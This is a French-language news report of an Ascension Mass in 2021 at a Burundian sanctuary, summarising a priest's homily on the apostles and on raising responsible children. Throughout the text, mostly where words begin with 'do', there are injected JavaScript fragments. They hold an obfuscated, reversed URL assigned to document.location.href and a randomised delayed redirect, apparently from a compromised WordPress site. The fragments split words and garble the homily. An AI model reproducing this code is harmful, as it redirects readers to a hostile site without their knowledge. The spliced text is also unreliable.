La solennité de l’Ascension de l’an 2021 a été célébrée avec éclat ce 13 Mai au sanctuaire de la Reine de la Paix et la Réconciliation de Mon Sion Gikungu.  Le célébrant Principal de la Messe de 10h00 était le Père Herménégilde Coyitungiye. Il a tout d’abord souhaité la bonne fête de l’Ascension de notre Seigneur à tous les pèlerins au Sanctuaire.  Il a alors annoncé que c’était une grande joie de contempler comment Jésus Christ nous fait entrer dans le Palais céleste, ce qui est un autre signe de sa résurrection. Il annoncé que dans notre contemplation du mystère de la résurrection de Jésus Christ nous adressons nos prières à Jésus avec toute confiance qu’il les exauce.  Les lectures du jour sont respectivement celles-ci : Première lecture : Livre des Actes des Apôtres (1,1- 11) ; le Psaume (46, 2-3. 6-7. 8-9) ; la deuxième lecture a été tirée de l’Epitre de saint Paul apôtre aux Ephésiens (4, 1-13) et l’Evangile selon saint Marc816, 15-20).

Homélie

Dans son enseignement basé principalement sur la responsabilisation des Apôtres et la responsabilisation des enfants dans les familles, Père Recteur COYITUNGIYE a d’abord annoncé que les 40 jours depuis que le Christ est ressuscité des morts étaient terminés, et en ce jour de l’Ascension nous célébrons cette victoire quand Jésus est monté au ciel auprès de son Père.  Il est vrai que la séparation est toujours difficile, et Jésus Lui-même le savait très bien. C’est pourquoi il a tenu à tranquilliser ses disciples avant qu’il ne monte, et par conséquent il nous tranquillise à notre tour : il précise qu’il monte pour nous préparer une place au ciel et qu’Il reviendra nous emmener pour que nous soyons près Lui. C’est dans cette situation de mélange de joie et de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}douleur que l’Ange trouve les Apôtres et leur demande pourquoi Ils regardent vers le ciel. Et partant de cette question on peut se demander, « pourquoi Jésus n’est pas resté jusqu’à la fin du monde pour nous emmener avec Lui au ciel le dernier jour, mais plutôt nous a laissé dans ce monde difficile, plein de pleurs », s’est interrogé le Père Herménégilde.  Quelle est la signification de l’Ascension? Il a fait savoir qu’on trouve de la réponse dans la Parole du jour :

  1. « Seigneur, est-ce maintenant le temps où tu vas rétablir le Royaume pour Israël», Ac1, 6. Les Apôtres sont contents de voir le Seigneur avec eux mais ils ont des toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doutes.  C’est pourtant très important que le Christ monte au ciel pour que les Apôtres grandissent dans la foi et dans leur responsabilité. Ils étaient habitués à ce que Jésus fasse tout pour eux, comme multiplier le pain et opérer des miracles. Jésus devait monter pour que les Apôtres grandissent et continuent à continuer l’œuvre d’annoncer la Bonne Nouvelle du salut que Jésus avait commencée ici sur terre.

Ici il ya un enseignement très important pour les familles. Les parents toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doivent laisser les enfants grandir et être responsables dans la famille et dans la vie. Ce n’est pas normal qu’un jeune home de trente ans continue à dépendre de sa mère même pour les unités de son téléphone. Il faut profondément  méditer sur la responsabilisation des enfants. Des fois quand les parents meurent toutes les pensées des enfants tournent sur comment s’approprier les biens de la famille, la maison et les voitures notamment. Il faut que toute personne apprenne à chercher sa propre richesse. Les jeunes salariés  devraient avoir leurs propres locations.  Mais aussi des fois les parents sont des blocages pour le progrès de leurs enfants, les gâtant en leur toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnant tout ce qu’ils veulent au lieu de leur apprendre à travailler pour les obtenir. Aussi le système scolaire burundais ne favorise pas l’affranchissement des enfants, ce qui peut expliquer pourquoi le Burundi est parmi les pays les plus pauvres.  On trouve des jeunes ayant terminé les écoles techniques, qui sont à la maison sans rien faire sous prétexte qu’ils n’ont pas de capital. Il n’y a pas de plus grand capital que les frais scolaires que les parents ont payés et les connaissances acquises à l’école. Un parent pourrait toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner 50 millions de francs à son enfant comme capital, mais il gaspillerait tout dans les boites de nuit et boissons, et fin des fins se retournera contre ses parents pour exiger plus d’argent. Si les Apôtres s’étaient comportés ainsi, aujourd’hui on ne serait nulle part. Mais Jésus les a laissés, sans toutefois les abantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner.  Il faut  aussi laisser les enfants se débrouiller dans la vie. Jésus devait monter chez son Père, et on voit qu’après l’Ascension les Apôtres deviendront de vrais Apôtres et s’accompliront la mission d’évangélisation ; c’est vrai que Jésus leur toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnera de la puissance et la force du Saint Esprit mais ils seront indépendants.

Parfois il faut prendre le risque comme Jésus l’a fait. Même un enfant, après 9 mois dans le sein de sa maman comprendra que c’est une nouvelle créature indépendante, quand on coupe le cortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don ombilical qui le lie à sa mère.  L’amour du parent pour son enfant se manifeste plutôt en l’aidant à savoir vivre seul quand il ne sera plus avec ses parents. Cela permettra d’ailleurs les parents à faire de la charité avec leur fortune en assistant les autres enfants nécessiteux puisqu’ils comprendront qu’il ne faut pas tout concentrer sur leur enfant, mais prendront tout enfant comme le leur. Il faut même contrôler la nutrition des enfants, puisque des fois gâter les enfants peut leur causer des maladies mais pas de maturation, responsabilité ou intelligence.

  1. « …vous allez recevoir une puissance, celle du Saint Esprit qui viendra sur vous ; vous serez alors mes témoins à Jérusalem, dans toute la Judée et la Samarie, et jusqu’aux extrémités de la terre » Ac1, 8. Nous avons reçu l’Esprit de force. Il faut que les gens voient en nous les signes de cet Esprit : l’amour, la paix, les actes de la charité, etc. Ils comprendront que Jésus est vivant en nous puisque Jésus dit que ceux qui auront cru chasseront les démons, parleront des langues nouvelles, prendront dans leurs mains des serpents, et s’ils boivent quelque poison mortel, cela ne leur fera aucun mal. Jésus avait préparé ses disciples à leur mission et des fois ils avaient eu de succès, mais Il leur a toujours fait comprendre que l’objectif ultime c’est hériter le ciel. Aujourd’hui le stage est terminé, c’est le travail. C’est la même chose pour nous aussi, celui qui croit en Jésus fera des miracles.
  2. « Quant à eux, ils partirent prêcher partout : le Seigneur agissait avec eux et confirmait la Parole par les signes qui l’accompagnaient» Mc16, 20. L’Ascension a été une autre façon pour Jésus de rester avec ses Apôtres. Il reste avec eux, les laisse faire les choses de leur façon mais les accompagne. Ils rencontreront de problèmes, mais Jésus sera toujours avec eux même dans ces problèmes, comme Saint Augustin dit que même si Jésus a été élevé dans les cieux Il continue à souffrir avec nous sur terre ; et on comprendra alors pourquoi Il dira « Saul, Saul pourquoi me persécute-tu». Mais aussi Il dira « j’avais faim et vous m’avez toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné à manger, j’avais soif et vous m’avez toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné à boire ». Il faut alors à notre tour être avec Lui.   Il utilise sa divinité, mais nous, nous utilisons la foi.  Même quand Il est descendu sur terre, Il n’avait pas quitté le ciel, de même en montant au ciel, Il n’a pas quitté la terre.  Nous avons même la raison de croire d’autant plus qu’Il est monté au ciel avec la chair d’un d’entre nous.
  3. « Apres l’Ascension, les Apôtres sont alors allés au Cénacle, dans une retraite avec Marie». C’était une retraite spirituelle pour se préparer à l’apostolat qui allait suivre. Marie est avec eux au Cénacle, et continue sans toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doute à les enseigner. C’est pourquoi nous aussi nous allons passer 9 jours au cénacle, pour nous préparer à la Pentecôte.

Le Père Coyitungiye a alors terminé son homélie en exhortant les Chrétiens à faire des retraites spirituelles, comprenant que dans une retraite spirituelle il ya de la force, que ce n’est pas du temps perdu.  Que même dans le congé annuel, chacun pourrait prendre au moins trois jours de retraite et de prière pour écouter ce que Dieu nous dit afin de comprendre ce qu’Il veut de nous. Que la Vierge Marie nous aide à méditer et comprendre le mystère de l’Ascension et le bonheur à venir. Amen

Fulgence Ndayizeye